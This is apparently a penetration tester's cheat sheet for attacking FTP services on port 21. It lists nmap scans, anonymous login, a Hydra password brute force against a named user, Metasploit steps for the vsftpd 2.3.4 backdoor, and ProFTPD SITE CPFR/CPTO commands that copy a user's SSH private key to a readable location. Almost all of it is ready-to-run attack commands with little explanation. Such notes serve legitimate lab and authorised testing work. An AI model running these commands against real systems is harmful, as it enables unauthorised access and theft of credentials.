21 - Pentesting FTP
Nmap
nmap -p 21 -A $(target)
Anonymous login
lftp $(target)
ftp $(target)
> anonymous
> anonymous
Bruteforce - Hydra
hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt -vV 10.10.227.75 ftp
nmap -p 21 --script=ftp-* $(target)
nmap -p 21 --script=ftp-anon.nse $(target)
Exploit
ProFtpd
searchsploit proftpd 1.3.5
VsFtpd 2.3.4
msf> use exploit/unix/ftp/vsftpd\_234\_backdoor
msf> show options
msf> set RHOST 192.168.0.101
msf> show options
msf> exploit
FTP Copy & Past
SITE CPFR /home/{TARGT_USER}/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa
SITE CPFR /home/{TARGT_USER}/.ssh/id_rsa.pub
SITE CPTO /var/tmp/id_rsa.pub